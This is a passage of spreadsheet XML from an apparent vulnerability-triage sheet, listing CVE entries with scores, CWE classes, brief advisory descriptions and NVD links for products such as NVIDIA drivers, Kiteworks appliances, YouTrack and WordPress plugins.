      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S371"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371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47544</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47546</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47546</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47547</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47547</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102133</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>An optional, separately licensed repository-connector feature in Kiteworks Core did not neutralize special characters in a user-supplied path before passing it to an external command. An authenticated system administrator could inject additional commands and write arbitrary content to files owned by the service account running the connector, enabling code execution in that account's context; exploitation additionally requires network egress from the appliance to a system under the attacker's control.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102133</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102135</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>On a Kiteworks Email Protection Gateway cluster with database replication enabled, a party trusted by the cluster could submit a crafted serialized object that was deserialized without sufficient validation, potentially allowing code execution as the gateway service account. Replication is disabled by default, and exploitation requires control of a trusted cluster peer or administrative access to the appliance.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102135</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102145</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator could cause the server to issue requests to, and interact with, internal network services that are not meant to be reachable through this interface. On its own this did not result in code execution.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102145</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100274</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 project Admin could trigger DoS via a notification template</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100274</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100279</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 changing an integration URL exposed its stored credentials</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100279</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100513</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in CF7 Views &amp;#8211; Complete Entry Management for Contact Form 7 &lt;= 3.2.5 versions.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100513</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101879</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1-3 contains a missing authorization vulnerability in NodeService capture handlers that allows connected gateways or agents to perform screen snapshots, camera snaps, and location captures without consent prompts. Attackers can invoke screen.snapshot, camera.snap, and location.get over the node WebSocket to silently capture screenshots, photograph users through webcams, and obtain device geolocation without user interaction.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101879</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101881</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an allocation of resources without limits vulnerability in the gateway WebSocket transport that allows connected gateways to exhaust node memory. Attackers can send an unending sequence of WebSocket continuation frames without EndOfMessage to cause unbounded memory growth until the node process crashes.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101881</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102124</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-670</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>A Kiteworks appliance setup interface did not enforce authentication once the appliance had completed initial configuration. An unauthenticated attacker with network access to the appliance could read and modify a limited set of setup records, including a contact name and email address captured during initial configuration.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102124</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102139</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>An authorization check in the large file exchange feature of Kiteworks Email Protection Gateway did not correctly establish that the requesting user was a party to the package being requested. An authenticated user of that optional feature could read the subject, message body, and attachments of packages they neither sent nor received.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102139</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102146</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>An authenticated Email Protection Gateway administrator holding only limited, delegated permissions could write files with attacker-controlled content to arbitrary locations accessible to the Email Protection Gateway service account. This exceeds the administrator's intended privileges and could be used to alter application files and configuration or to disrupt the availability of the service.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102146</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102375</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in Optimole &lt;= 4.2.14 versions.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102375</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102386</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in WP Photo Album Plus &lt;= 9.3.02.003 versions.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102386</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102397</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Ultimate Maps by Supsystic &lt;= 1.5.5 versions.</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102397</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102588</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
